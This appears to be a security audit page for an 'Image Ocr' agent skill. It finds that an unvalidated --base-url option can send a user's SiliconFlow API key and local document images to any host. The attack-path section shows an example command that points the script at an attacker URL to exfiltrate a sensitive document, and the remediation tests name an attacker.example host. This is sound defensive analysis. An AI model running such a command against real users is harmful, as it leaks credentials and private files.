Back to skill

Security audit

Image Ocr

Security checks for vulnerabilities and agentic risk

Overview

This OCR skill is mostly coherent, but it can send the user's API key and document contents to an arbitrary caller-supplied endpoint.

Review before installing. Use this only for documents you are comfortable sending to SiliconFlow, avoid sensitive IDs, financial records, credentials, or private business screenshots unless that upload is acceptable, and do not pass --base-url unless it is validated as the real SiliconFlow HTTPS endpoint. The publisher should remove or strictly validate custom endpoints before this is treated as a normal low-risk OCR helper.

Vulnerability Patterns
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
Findings (1)

T09 · Insecure Skill Coding Practices

Error
Location
scripts/paddleocr_vl.py:25
Finding

User-Controlled API Endpoint Can Expose the API Key and OCR Data

Content
View full analysis

Vulnerability Details

File Location: scripts/paddleocr_vl.py, lines 25 and 52–63
Vulnerability Type: Arbitrary credential and sensitive-data transmission
Risk Level: High

Vulnerable Code

python
ap.add_argument("--base-url", default="https://api.siliconflow.cn/v1")
python
url = args.base_url.rstrip("/") + "/chat/completions"
req = urllib.request.Request(
    url,
    data=json.dumps(payload).encode("utf-8"),
    headers={
        "Authorization": f"Bearer {key}",
        "Content-Type": "application/json",
    },
    method="POST",
)

The request payload may include a local image encoded as a data URI:

python
content.append({
    "type": "image_url",
    "image_url": {"url": to_data_uri(args.image_path)}
})

Technical Analysis

The --base-url argument accepts an arbitrary URL without validating its scheme or hostname. The script then sends the SiliconFlow API key in the Authorization header to that destination. The request body also contains the user's prompt and may contain the complete contents of a selected local image encoded as Base64.

Base64 is necessary to construct the documented image data URI and is not itself encryption, obfuscation, or evidence of a covert channel. The vulnerability arises because the resulting sensitive payload and API credential can be sent to an unrestricted, user-controlled endpoint.

This exceeds the minimum privileges required for the declared functionality. The Skill is documented as using https://api.siliconflow.cn/v1, so transmitting a SiliconFlow credential to arbitrary hosts is unnecessary. Allowing an http:// URL would additionally transmit the credential and OCR data without transport encryption.

Attack Path

  1. An attacker persuades a user or invoking agent to supply a malicious option such as:
    bash
    python scripts/paddleocr_vl.py \
      --prompt "Extract all text" \
      --image-path /path/to/sensitive-document.png \
      --base-url https://attacke
    

...[truncated 1346 chars]

Remediation
View remediation

Remediation Suggestions

  1. Remove the --base-url option if custom endpoints are not essential, and use a fixed endpoint:

    python
    base_url = "https://api.siliconflow.cn/v1"
    
  2. If endpoint configurability is required, parse and validate the URL before reading or transmitting the credential:

    • Require the https scheme.
    • Reject embedded usernames and passwords.
    • Allowlist the exact hostname api.siliconflow.cn.
    • Reject unexpected ports.
    • Normalize the hostname before comparison.
  3. Never send a SiliconFlow API key to a non-SiliconFlow hostname. If support for other providers is intentional, require a separate, explicitly supplied credential for each provider.

  4. Fail closed when validation fails, before reading the local image or secret file.

  5. Consider displaying the validated destination and requiring explicit confirmation before uploading sensitive local documents to any non-default endpoint.

  6. Document that local images and prompts are transmitted to a remote OCR provider and that Base64 is transport encoding rather than confidentiality protection.

  7. Add automated tests confirming rejection of:

    • http:// URLs.
    • Unapproved domains and subdomains.
    • URLs containing user-information components.
    • Alternate ports.
    • Hostname confusion cases such as api.siliconflow.cn.attacker.example.
  8. Rotate the SiliconFlow API key if the unrestricted endpoint option has previously been used with an untrusted destination.

Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Taint TrackingDirect Taint Flow, Variable-Mediated Taint Flow, Credential Exfiltration Chain
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (7)

Tainted flow: 'req' from os.getenv (line 60, credential/environment) → urllib.request.urlopen (network output)

Critical
Category
Data Flow
Confidence
90% confidence
Finding

Credentials or environment variables flow to a network sink. This is a high-confidence indicator of credential exfiltration.

Content

Scanner excerpt · scripts/paddleocr_vl.py (reported line 71)May include surrounding context.

python
)

    try:
        with urllib.request.urlopen(req, timeout=90) as resp:
            body = resp.read().decode("utf-8", errors="replace")
            print(body)
            return 0

Tp4

High
Category
MCP Tool Poisoning
Confidence
97% confidence
Finding

The skill description promises a narrow OCR function, but the underlying behavior appears to be a generic multimodal chat-completions wrapper that forwards arbitrary prompts and returns raw model output. That mismatch is dangerous because users and orchestrators may trust it as a constrained OCR utility while it can process broader instructions and transmit image and prompt contents externally, creating unanticipated data handling and policy-bypass risk.

Content

No source excerpt is available for this finding.

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
94% confidence
Finding

The skill advertises and relies on environment access, local file reads, and outbound network access, but does not declare any explicit tool scope or permissions. This is dangerous because consumers and policy systems cannot accurately constrain the skill's capabilities, increasing the chance of unintended secret access, local file exposure, or data exfiltration through the OCR workflow.

Content

No source excerpt is available for this finding.

External Transmission

Medium
Category
Data Exfiltration
Confidence
60% confidence
Finding

Data is being sent to an external URL. This could be legitimate telemetry or data exfiltration. Manual review is recommended.

Content

Scanner excerpt · SKILL.md (reported line 50)May include surrounding context.

md
ap.add_argument("--image-path", help="Local image path")
    ap.add_argument("--image-url", help="Remote image URL")
    ap.add_argument("--max-tokens", type=int, default=512)
    ap.add_argument("--base-url", default="https://api.siliconflow.cn/v1")
    ap.add_argument("--model", default="PaddlePaddle/PaddleOCR-VL-1.5")
    args = ap.parse_args()

External Transmission

Medium
Category
Data Exfiltration
Confidence
60% confidence
Finding

Data is being sent to an external URL. This could be legitimate telemetry or data exfiltration. Manual review is recommended.

Content

Scanner excerpt · scripts/paddleocr_vl.py (reported line 25)May include surrounding context.

python
ap.add_argument("--image-path", help="Local image path")
    ap.add_argument("--image-url", help="Remote image URL")
    ap.add_argument("--max-tokens", type=int, default=512)
    ap.add_argument("--base-url", default="https://api.siliconflow.cn/v1")
    ap.add_argument("--model", default="PaddlePaddle/PaddleOCR-VL-1.5")
    args = ap.parse_args()

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
81% confidence
Finding

The manifest frames this skill as an OCR utility for extracting text from images, with supported inputs being local path, URL, and base64 image data. Reading credentials from environment variables is a normal implementation detail for calling the OCR API, but additionally probing a specific local secrets file introduces a local file access capability not justified by the stated OCR-focused purpose.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
96% confidence
Finding

This script transmits user prompt data and potentially full local image contents to a third-party OCR API, but it provides no user-facing warning, consent mechanism, or minimization of sensitive content. In an OCR skill, screenshots, receipts, and forms commonly contain PII, credentials, financial data, or internal business information, making silent remote exfiltration materially risky.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.